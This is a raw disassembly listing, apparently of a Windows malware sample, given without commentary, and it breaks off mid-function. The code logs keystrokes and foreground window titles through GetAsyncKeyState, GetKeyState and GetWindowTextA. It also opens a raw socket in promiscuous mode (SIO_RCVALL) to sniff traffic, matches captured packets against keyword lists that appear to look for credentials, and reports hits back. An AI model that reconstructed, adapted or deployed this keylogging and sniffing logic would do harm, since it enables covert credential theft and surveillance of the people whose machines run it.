lea eax, [ebp+String]
pop ecx
lea esi, [ebp+var_E0]
mov edi, esp
push eax ; int
lea eax, [ebp+var_4E0]
push eax ; int
rep movsd
call sub_402658
mov [ebp+arg_0], eax
push ebx
lea eax, [ebp+var_2E0]
push 0
push eax
call sub_4179E0
add esp, 0ACh
lea eax, [ebp+var_4E0]
push ebx
push 0
push eax
call sub_4179E0
add esp, 0Ch
loc_4028D6: ; CODE XREF: sub_402703+6C�j
; sub_402703+120�j ...
cmp [ebp+var_58], 0
jz loc_402981
push 1 ; vKey
call GetAsyncKeyState ; GetAsyncKeyState
cmp ax, 8001h
jnz loc_402981
lea eax, [ebp+var_2E0]
push eax
call sub_4180D0
test eax, eax
pop ecx
jbe short loc_402981
call GetForegroundWindow ; GetForegroundWindow
lea ecx, [ebp+var_520]
push 3Ch ; nMaxCount
push ecx ; lpString
push eax ; hWnd
call GetWindowTextA ; GetWindowTextA
lea eax, [ebp+var_2E0]
push eax
lea eax, [ebp+var_4E0]
push 4274ECh
push eax ; int
call sub_41795B
sub esp, 8Ch
lea eax, [ebp+var_520]
lea esi, [ebp+var_E0]
push 26h
pop ecx
mov edi, esp
push eax ; int
lea eax, [ebp+var_4E0]
rep movsd
push eax ; int
call sub_402658
mov [ebp+arg_0], eax
push ebx
lea eax, [ebp+var_2E0]
push 0
push eax
call sub_4179E0
add esp, 0ACh
lea eax, [ebp+var_4E0]
push ebx
push 0
push eax
call sub_4179E0
add esp, 0Ch
loc_402981: ; CODE XREF: sub_402703+164�j
; sub_402703+1D7�j ...
mov [ebp+var_4], 426CE4h
loc_402988: ; CODE XREF: sub_402703+48A�j
push 10h ; nVirtKey
call GetKeyState ; GetKeyState
movsx esi, ax
mov eax, [ebp+var_4]
mov edi, [eax-4]
push edi ; vKey
call GetAsyncKeyState ; GetAsyncKeyState
test ah, ah
jns short loc_402A1F
push 14h ; nVirtKey
call GetKeyState ; GetKeyState
test ax, ax
jz short loc_4029D0
cmp esi, 0FFFFFFFFh
jle short loc_4029D0
cmp edi, 40h
jle short loc_4029D0
cmp edi, 5Bh
jge short loc_4029D0
mov [ebp+edi*4+var_920], 1
jmp loc_402B82
; ---------------------------------------------------------------------------
loc_4029D0: ; CODE XREF: sub_402703+2AC�j
; sub_402703+2B1�j ...
push 14h ; nVirtKey
call GetKeyState ; GetKeyState
test ax, ax
jz short loc_4029FB
test esi, esi
jge short loc_402A0F
cmp edi, 40h
jle short loc_4029FB
cmp edi, 5Bh
jge short loc_4029FB
mov [ebp+edi*4+var_920], 2
jmp loc_402B82
; ---------------------------------------------------------------------------
loc_4029FB: ; CODE XREF: sub_402703+2D8�j
; sub_402703+2E1�j ...
test esi, esi
jge short loc_402A0F
mov [ebp+edi*4+var_920], 3
jmp loc_402B82
; ---------------------------------------------------------------------------
loc_402A0F: ; CODE XREF: sub_402703+2DC�j
; sub_402703+2FA�j
mov [ebp+edi*4+var_920], 4
jmp loc_402B82
; ---------------------------------------------------------------------------
loc_402A1F: ; CODE XREF: sub_402703+29F�j
lea eax, [ebp+edi*4+var_920]
mov esi, [eax]
test esi, esi
jz loc_402B82
and dword ptr [eax], 0
lea eax, [ebp+var_2E0]
push eax
call sub_4180D0
cmp edi, 8
pop ecx
jnz short loc_402A52
and [ebp+eax+var_2E1], 0
jmp loc_402B82
; ---------------------------------------------------------------------------
loc_402A52: ; CODE XREF: sub_402703+340�j
cmp eax, 1B9h
jbe short loc_402AA1
call GetForegroundWindow ; GetForegroundWindow
lea ecx, [ebp+String]
push 3Ch ; nMaxCount
push ecx ; lpString
push eax ; hWnd
call GetWindowTextA ; GetWindowTextA
cmp [ebp+var_58], 0
jz short loc_402A8F
lea eax, [ebp+var_2E0]
push eax
push 4274ACh
loc_402A7E: ; CODE XREF: sub_402703+3E1�j
lea eax, [ebp+var_4E0]
push eax
call sub_41795B
add esp, 0Ch
jmp short loc_402B05
; ---------------------------------------------------------------------------
loc_402A8F: ; CODE XREF: sub_402703+36D�j
lea eax, [ebp+String]
push eax
lea eax, [ebp+var_2E0]
push eax
push 42748Ch
jmp short loc_402AF6
; ---------------------------------------------------------------------------
loc_402AA1: ; CODE XREF: sub_402703+354�j
cmp edi, 0Dh
jnz loc_402B54
lea eax, [ebp+var_2E0]
push eax
call sub_4180D0
test eax, eax
pop ecx
jz loc_402B82
call GetForegroundWindow ; GetForegroundWindow
lea ecx, [ebp+String]
push 3Ch ; nMaxCount
push ecx ; lpString
push eax ; hWnd
call GetWindowTextA ; GetWindowTextA
cmp [ebp+var_58], 0
jz short loc_402AE6
lea eax, [ebp+var_2E0]
push eax
push 427474h
jmp short loc_402A7E
; ---------------------------------------------------------------------------
loc_402AE6: ; CODE XREF: sub_402703+3D3�j
lea eax, [ebp+String]
push eax
lea eax, [ebp+var_2E0]
push eax
push 427458h
loc_402AF6: ; CODE XREF: sub_402703+39C�j
lea eax, [ebp+var_4E0]
push eax
call sub_41795B
add esp, 10h
loc_402B05: ; CODE XREF: sub_402703+38A�j
sub esp, 98h
lea eax, [ebp+String]
lea esi, [ebp+var_E0]
push 26h
pop ecx
mov edi, esp
push eax ; int
lea eax, [ebp+var_4E0]
rep movsd
push eax ; int
call sub_402658
mov [ebp+arg_0], eax
push ebx
lea eax, [ebp+var_2E0]
push 0
push eax
call sub_4179E0
add esp, 0ACh
lea eax, [ebp+var_4E0]
push ebx
push 0
push eax
call sub_4179E0
add esp, 0Ch
jmp short loc_402B82
; ---------------------------------------------------------------------------
loc_402B54: ; CODE XREF: sub_402703+3A1�j
cmp esi, 1
jz short loc_402B6D
cmp esi, 3
jz short loc_402B6D
cmp esi, 2
jz short loc_402B68
cmp esi, 4
jnz short loc_402B82
loc_402B68: ; CODE XREF: sub_402703+45E�j
push [ebp+var_4]
jmp short loc_402B74
; ---------------------------------------------------------------------------
loc_402B6D: ; CODE XREF: sub_402703+454�j
; sub_402703+459�j
mov eax, [ebp+var_4]
add eax, 7
push eax
loc_402B74: ; CODE XREF: sub_402703+468�j
lea eax, [ebp+var_2E0]
push eax
call sub_417FF0
pop ecx
pop ecx
loc_402B82: ; CODE XREF: sub_402703+2C8�j
; sub_402703+2F3�j ...
add [ebp+var_4], 14h
cmp [ebp+var_4], 427414h
jl loc_402988
cmp [ebp+arg_0], 0
jz loc_40275E
push [ebp+var_DC]
call sub_417735
pop ecx
push 0 ; dwExitCode
call ExitThread ; ExitThread
sub_402703 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_402BB1(LPVOID)
sub_402BB1 proc near ; DATA XREF: sub_40FCA3+1E2D�o
buf = byte ptr -102B4h
var_102AB = byte ptr -102ABh
var_102A8 = dword ptr -102A8h
hostshort = word ptr -102A0h
var_10293 = byte ptr -10293h
var_1028C = byte ptr -1028Ch
var_2B4 = dword ptr -2B4h
s = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
cbBytesReturned = dword ptr -20h
name = sockaddr ptr -1Ch
in = in_addr ptr -0Ch
vInBuffer = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 102B4h
call sub_417F30
mov edx, [ebp+arg_0]
push esi
push edi
push 25h
xor eax, eax
pop ecx
mov esi, edx
lea edi, [ebp+s]
inc eax
push 10h
rep movsd
mov [ebp+vInBuffer], eax
mov [edx+90h], eax
xor esi, esi
lea eax, [ebp+name]
push esi
push eax
call sub_4179E0
add esp, 0Ch
mov [ebp+name.sa_family], 2
push esi ; hostshort
call htons_2
push [ebp+s] ; s
mov word ptr [ebp+name.sa_data], ax
call sub_40B972
pop ecx
push eax ; cp
call inet_addr_0
push esi ; protocol
push 3 ; type
push 2 ; af
mov dword ptr [ebp+name.sa_data+2], eax
call socket_0
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jnz short loc_402C86
call WSAGetLastError ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push 427EB8h
push eax
call sub_41795B
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_402C69
push esi ; int
lea eax, [ebp+var_2B4]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_B0]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_402C69: ; CODE XREF: sub_402BB1+96�j
lea eax, [ebp+var_2B4]
push eax
call sub_40CB08
push [ebp+var_30]
call sub_417735
pop ecx
pop ecx
push esi ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_402C86: ; CODE XREF: sub_402BB1+76�j
mov eax, [ebp+var_30]
push 10h ; namelen
imul eax, 234h
mov [eax+44B874h], edi
lea eax, [ebp+name]
push eax ; name
push edi ; s
call bind_0
cmp eax, 0FFFFFFFFh
jnz short loc_402D0B
call WSAGetLastError ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push 427E70h
push eax
call sub_41795B
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_402CE7
push esi ; int
lea eax, [ebp+var_2B4]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_B0]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_402CE7: ; CODE XREF: sub_402BB1+114�j
lea eax, [ebp+var_2B4]
push eax
call sub_40CB08
pop ecx
push edi ; s
call closesocket_0
push [ebp+var_30]
call sub_417735
pop ecx
push esi ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_402D0B: ; CODE XREF: sub_402BB1+F4�j
push esi ; lpCompletionRoutine
lea eax, [ebp+cbBytesReturned]
push esi ; lpOverlapped
push eax ; lpcbBytesReturned
push esi ; cbOutBuffer
push esi ; lpvOutBuffer
lea eax, [ebp+vInBuffer]
push 4 ; cbInBuffer
push eax ; lpvInBuffer
push 98000001h ; dwIoControlCode
push edi ; s
call WSAIoctl ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_402D8E
call WSAGetLastError ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push 427E28h
push eax
call sub_41795B
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_402D6A
push esi ; int
lea eax, [ebp+var_2B4]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_B0]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_402D6A: ; CODE XREF: sub_402BB1+197�j
lea eax, [ebp+var_2B4]
push eax
call sub_40CB08
pop ecx
push edi ; s
call closesocket_0
push [ebp+var_30]
call sub_417735
pop ecx
push esi ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_402D8E: ; CODE XREF: sub_402BB1+177�j
push ebx
mov ebx, 427520h
loc_402D94: ; CODE XREF: sub_402BB1+21C�j
; sub_402BB1+22E�j ...
push 0FFFFh
lea eax, [ebp+buf]
push esi
push eax
call sub_4179E0
add esp, 0Ch
lea eax, [ebp+buf]
push esi ; flags
push 0FFFFh ; len
push eax ; buf
push edi ; s
call recv_0
cmp eax, 0FFFFFFFFh
jz loc_402EA6
cmp [ebp+var_102AB], 6
jnz short loc_402D94
mov eax, [ebp+var_102A8]
cmp [ebp+var_10293], 18h
mov dword ptr [ebp+in.S_un], eax
jnz short loc_402D94
lea eax, [ebp+var_1028C]
push 427E1Ch
push eax
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_402D94
xor edi, edi
mov eax, ebx
mov [ebp+arg_0], ebx
loc_402DFF: ; CODE XREF: sub_402BB1+269�j
push eax
lea eax, [ebp+var_1028C]
push eax
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_402E24
inc edi
add [ebp+arg_0], 18h
mov eax, [ebp+arg_0]
jnz short loc_402DFF
loc_402E1C: ; CODE XREF: sub_402BB1+2F0�j
mov edi, [ebp+var_4]
jmp loc_402D94
; ---------------------------------------------------------------------------
loc_402E24: ; CODE XREF: sub_402BB1+25F�j
lea eax, [ebp+var_1028C]
push eax
push dword ptr [ebp+hostshort] ; hostshort
call htons_1
movzx eax, ax
push eax
push dword ptr [ebp+in.S_un] ; in
call inet_ntoa_0
push eax
lea eax, [edi+edi*2]
mov eax, dword ptr unk_427534[eax*8]
push dword ptr unk_427510[eax*4]
lea eax, [ebp+var_2B4]
push 427DD8h
push 200h
push eax
call sub_417EDA
add esp, 1Ch
cmp [ebp+var_28], esi
jnz short loc_402E94
push esi ; int
lea eax, [ebp+var_2B4]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_B0]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_402E94: ; CODE XREF: sub_402BB1+2C1�j
lea eax, [ebp+var_2B4]
push eax
call sub_40CB08
pop ecx
jmp loc_402E1C
; ---------------------------------------------------------------------------
loc_402EA6: ; CODE XREF: sub_402BB1+20F�j
call WSAGetLastError ; WSAGetLastError
push eax
push 427D90h
lea eax, [ebp+var_2B4]
push 200h
push eax
call sub_417EDA
add esp, 10h
cmp [ebp+var_28], esi
pop ebx
jnz short loc_402EEC
push esi ; int
lea eax, [ebp+var_2B4]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_B0]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_402EEC: ; CODE XREF: sub_402BB1+319�j
lea eax, [ebp+var_2B4]
push eax
call sub_40CB08
pop ecx
push edi ; s
call closesocket_0
push [ebp+var_30]
call sub_417735
pop ecx
push esi ; dwExitCode
call ExitThread ; ExitThread
sub_402BB1 endp
; =============== S U B R O U T I N E =======================================
sub_402F10 proc near ; CODE XREF: sub_40321F+20F�p
; sub_40321F+239�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword ptr unk_440F94, eax
mov eax, 440F94h
retn
sub_402F10 endp
; =============== S U B R O U T I N E =======================================
sub_402F1F proc near ; CODE XREF: sub_40321F+2B0�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 427F74h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jz short loc_402F39
loc_402F35: ; CODE XREF: sub_402F1F+29�j
; sub_402F1F+3A�j ...
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_402F39: ; CODE XREF: sub_402F1F+14�j
push 431630h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_402F35
push 427F68h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_402F35
push 427F5Ch
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_402F35
push 427F54h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jz short loc_402F81
loc_402F7D: ; CODE XREF: sub_402F1F+71�j
; sub_402F1F+82�j ...
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_402F81: ; CODE XREF: sub_402F1F+5C�j
push 427F4Ch
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_402F7D
push 427F44h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_402F7D
push 427F3Ch
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_402F7D
push 427F34h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_402F7D
push 427F2Ch
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_402F7D
push 427F24h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_402F7D
push 427F1Ch
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_402F7D
push 427F14h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz loc_402F7D
push 427F08h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz loc_402F7D
push 427EFCh
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_402F1F endp
; =============== S U B R O U T I N E =======================================
sub_403036 proc near ; CODE XREF: sub_40321F:loc_4034FE�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 427FB4h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jz short loc_403050
loc_40304C: ; CODE XREF: sub_403036+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_403050: ; CODE XREF: sub_403036+14�j
push 431630h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_40304C
push 427FACh
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jz short loc_403076
loc_403072: ; CODE XREF: sub_403036+4F�j
; sub_403036+60�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_403076: ; CODE XREF: sub_403036+3A�j
push 427FA4h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_403072
push 427F9Ch
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_403072
push 427F80h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_403036 endp
; =============== S U B R O U T I N E =======================================
sub_4030AC proc near ; CODE XREF: sub_40321F:loc_40352A�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 427FE0h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jz short loc_4030C6
loc_4030C2: ; CODE XREF: sub_4030AC+29�j
; sub_4030AC+3A�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_4030C6: ; CODE XREF: sub_4030AC+14�j
push 431630h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_4030C2
push 427FA4h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_4030C2
push 427FD8h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jz short loc_4030FD
loc_4030F9: ; CODE XREF: sub_4030AC+60�j
; sub_4030AC+71�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_4030FD: ; CODE XREF: sub_4030AC+4B�j
push 427FD0h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_4030F9
push 427FC8h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_4030F9
push 427FC0h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_4030AC endp
; =============== S U B R O U T I N E =======================================
sub_403133 proc near ; CODE XREF: sub_40321F+33E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 428020h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jz short loc_40314D
loc_403149: ; CODE XREF: sub_403133+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_40314D: ; CODE XREF: sub_403133+14�j
push 431630h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_403149
push 428018h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jz short loc_403173
loc_40316F: ; CODE XREF: sub_403133+4F�j
; sub_403133+60�j ...
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_403173: ; CODE XREF: sub_403133+3A�j
push 428010h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_40316F
push 428004h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_40316F
push 427FF8h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_40316F
push 427FECh
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_403133 endp
; =============== S U B R O U T I N E =======================================
sub_4031BA proc near ; CODE XREF: sub_40321F:loc_4035C5�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 42805Ch
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jz short loc_4031D4
loc_4031D0: ; CODE XREF: sub_4031BA+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_4031D4: ; CODE XREF: sub_4031BA+14�j
push 431630h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_4031D0
push 42804Ch
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jz short loc_4031FA
loc_4031F6: ; CODE XREF: sub_4031BA+4F�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_4031FA: ; CODE XREF: sub_4031BA+3A�j
push 428038h
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
jnz short loc_4031F6
push 42802Ch
push esi
call sub_417F60
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_4031BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_40321F(LPVOID)
sub_40321F proc near ; DATA XREF: sub_40FCA3+1F79�o
buf = byte ptr -113B8h
var_113AF = byte ptr -113AFh
var_113AC = dword ptr -113ACh
var_113A8 = dword ptr -113A8h
hostshort = word ptr -113A4h
var_1138C = byte ptr -1138Ch
var_13B8 = byte ptr -13B8h
var_BB8 = byte ptr -0BB8h
name = byte ptr -3B8h
var_2B8 = dword ptr -2B8h
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
cbBytesReturned = dword ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
s = dword ptr -10h
vInBuffer = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 113B8h
call sub_417F30
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 25h
mov esi, eax
pop ecx
lea edi, [ebp+var_B8]
rep movsd
xor esi, esi
push 3Fh
inc esi
xor ebx, ebx
mov [eax+90h], esi
pop ecx
xor eax, eax
lea edi, [ebp-3B7h]
mov [ebp+name], bl
push 0FFh ; namelen
rep stosd
stosw
lea eax, [ebp+name]
mov [ebp+var_20], 2
push eax ; name
mov [ebp+var_1E], bx
mov [ebp+var_1C], ebx
call gethostname ; gethostname
lea eax, [ebp+name]
push eax ; name
call gethostbyname ; gethostbyname
movsx ecx, word ptr [eax+0Ah]
mov eax, [eax+0Ch]
push ecx
push dword ptr [eax]
lea eax, [ebp+var_8]
push eax
call sub_417A40
mov eax, [ebp+var_8]
add esp, 0Ch
mov [ebp+var_1C], eax
push ebx ; protocol
push 3 ; type
push 2 ; af
call socket_0
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+s], edi
jnz short loc_4032C5
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_4032C5: ; CODE XREF: sub_40321F+9B�j
lea eax, [ebp+var_20]
push 10h ; namelen
push eax ; name
push edi ; s
call bind_0
cmp eax, 0FFFFFFFFh
jnz short loc_403334
call WSAGetLastError ; WSAGetLastError
push eax
lea eax, [ebp+var_2B8]
push 427E70h
push eax
call sub_41795B
add esp, 0Ch
cmp [ebp+var_2C], ebx
jnz short loc_403317
push ebx ; int
lea eax, [ebp+var_2B8]
push [ebp+var_30] ; int
push eax ; int
lea eax, [ebp+var_B4]
push eax ; int
push [ebp+var_B8] ; s
call sub_40E1D6
add esp, 14h
loc_403317: ; CODE XREF: sub_40321F+D6�j
lea eax, [ebp+var_2B8]
push eax
call sub_40CB08
push [ebp+var_34]
call sub_417735
pop ecx
pop ecx
push ebx ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_403334: ; CODE XREF: sub_40321F+B6�j
push ebx ; lpCompletionRoutine
lea eax, [ebp+cbBytesReturned]
push ebx ; lpOverlapped
push eax ; lpcbBytesReturned
push ebx ; cbOutBuffer
push ebx ; lpvOutBuffer
lea eax, [ebp+vInBuffer]
push 4 ; cbInBuffer
push eax ; lpvInBuffer
push 98000001h ; dwIoControlCode
push edi ; s
mov [ebp+vInBuffer], esi
call WSAIoctl ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_4033BA
call WSAGetLastError ; WSAGetLastError
push eax
lea eax, [ebp+var_2B8]
push 427E28h
push eax
call sub_41795B
add esp, 0Ch
cmp [ebp+var_2C], ebx
jnz short loc_403396
push ebx ; int
lea eax, [ebp+var_2B8]
push [ebp+var_30] ; int
push eax ; int
lea eax, [ebp+var_B4]
push eax ; int
push [ebp+var_B8] ; s
call sub_40E1D6
add esp, 14h
loc_403396: ; CODE XREF: sub_40321F+155�j
lea eax, [ebp+var_2B8]
push eax
call sub_40CB08
pop ecx
push edi ; s
call closesocket_0
push [ebp+var_34]
call sub_417735
pop ecx
push ebx ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_4033BA: ; CODE XREF: sub_40321F+135�j
mov esi, 200h
loc_4033BF: ; CODE XREF: sub_40321F+1CF�j
; sub_40321F+1F8�j ...
mov edi, 0FFFFh
lea eax, [ebp+buf]
push edi
push ebx
push eax
call sub_4179E0
add esp, 0Ch
lea eax, [ebp+buf]
push ebx ; flags
push edi ; len
push eax ; buf
push [ebp+s] ; s
call recv_0
cmp [ebp+var_113AF], 6
jnz short loc_4033BF
push dword ptr [ebp+hostshort] ; hostshort
call htons_0
push dword ptr [ebp+hostshort+2] ; hostshort
movzx edi, ax
mov [ebp+var_4], edi
call htons_0
movzx eax, ax
cmp edi, 6Eh
mov [ebp+arg_0], eax
jz short loc_4033BF
cmp edi, 19h
jz short loc_4033BF
cmp eax, 6Eh
jz short loc_4033BF
cmp eax, 19h
jz short loc_4033BF
push [ebp+var_113AC]
call sub_402F10
mov edi, inet_ntoa
add esp, 4
push dword ptr [eax] ; in
call edi ; inet_ntoa
push eax
lea eax, [ebp+var_13B8]
push 42744Ch
push eax
call sub_41795B
push [ebp+var_113A8]
call sub_402F10
add esp, 10h
push dword ptr [eax] ; in
call edi ; inet_ntoa
push eax
lea eax, [ebp+var_BB8]
push 42744Ch
push eax
call sub_41795B
lea eax, [ebp+var_1138C]
xor edi, edi
push eax
call sub_4180D0
add esp, 10h
test eax, eax
jle short loc_4034B4
loc_40348B: ; CODE XREF: sub_40321F+293�j
lea eax, [ebp+edi+var_1138C]
cmp byte ptr [eax], 0Dh
jnz short loc_40349A
mov byte ptr [eax], 20h
loc_40349A: ; CODE XREF: sub_40321F+276�j
cmp byte ptr [eax], 0Ah
jnz short loc_4034A2
mov byte ptr [eax], 20h
loc_4034A2: ; CODE XREF: sub_40321F+27E�j
lea eax, [ebp+var_1138C]
inc edi
push eax
call sub_4180D0
cmp edi, eax
pop ecx
jl short loc_40348B
loc_4034B4: ; CODE XREF: sub_40321F+26A�j
cmp [ebp+var_4], 50h
jz loc_403556
cmp [ebp+arg_0], 50h
jz loc_403556
lea eax, [ebp+var_1138C]
push eax
call sub_402F1F
test al, al
pop ecx
lea eax, [ebp+var_1138C]
push eax
jz short loc_4034FE
push [ebp+arg_0]
lea eax, [ebp+var_BB8]
push eax
lea eax, [ebp+var_13B8]
push [ebp+var_4]
push eax
push 428188h
jmp loc_403587
; ---------------------------------------------------------------------------
loc_4034FE: ; CODE XREF: sub_40321F+2BF�j
call sub_403036
test al, al
pop ecx
lea eax, [ebp+var_1138C]
push eax
jz short loc_40352A
push [ebp+arg_0]
lea eax, [ebp+var_BB8]
push eax
lea eax, [ebp+var_13B8]
push [ebp+var_4]
push eax
push 428140h
jmp short loc_403587
; ---------------------------------------------------------------------------
loc_40352A: ; CODE XREF: sub_40321F+2EE�j
call sub_4030AC
test al, al
pop ecx
jz short loc_403556
lea eax, [ebp+var_1138C]
push eax
lea eax, [ebp+var_BB8]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_13B8]
push [ebp+var_4]
push eax
push 4280F8h
jmp short loc_403587
; ---------------------------------------------------------------------------
loc_403556: ; CODE XREF: sub_40321F+299�j
; sub_40321F+2A3�j ...
lea eax, [ebp+var_1138C]
push eax
call sub_403133
test al, al
pop ecx
lea eax, [ebp+var_1138C]
push eax
jz short loc_4035C5
push [ebp+arg_0]
lea eax, [ebp+var_BB8]
push eax
lea eax, [ebp+var_13B8]
push [ebp+var_4]
push eax
push 4280B0h
loc_403587: ; CODE XREF: sub_40321F+2DA�j
; sub_40321F+309�j ...
lea eax, [ebp+var_2B8]
push esi
push eax
call sub_417EDA
add esp, 20h
cmp [ebp+var_2C], ebx
jnz loc_4033BF
push ebx ; int
lea eax, [ebp+var_2B8]
push [ebp+var_30] ; int
push eax ; int
lea eax, [ebp+var_B4]
push eax ; int
push [ebp+var_B8] ; s
call sub_40E1D6
add esp, 14h
jmp loc_4033BF
; ---------------------------------------------------------------------------
loc_4035C5: ; CODE XREF: sub_40321F+34D�j
call sub_4031BA
test al, al
pop ecx
jz loc_4033BF
lea eax, [ebp+var_1138C]
push eax
lea eax, [ebp+var_BB8]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_13B8]
push [ebp+var_4]
push eax
push 428068h
jmp short loc_403587
sub_40321F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4035F5(LPCSTR lpMultiByteStr, LPNETRESOURCEW lpNetResource)
sub_4035F5 proc near ; CODE XREF: .text:00403A06�p
var_354 = byte ptr -354h
var_34E = byte ptr -34Eh
WideCharStr = word ptr -124h
var_C = byte ptr -0Ch
lpMultiByteStr = dword ptr 8
lpNetResource = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 354h
push ebx
push esi
push edi
mov esi, 4286F8h
lea edi, [ebp+var_C]
mov ecx, 8Ah
movsd
movsd
movsd
mov esi, 4286F0h
lea edi, [ebp+var_354]
movsd
movsw
xor eax, eax
lea edi, [ebp+var_34E]
rep stosd
stosw
mov al, CommandLine
push 45h
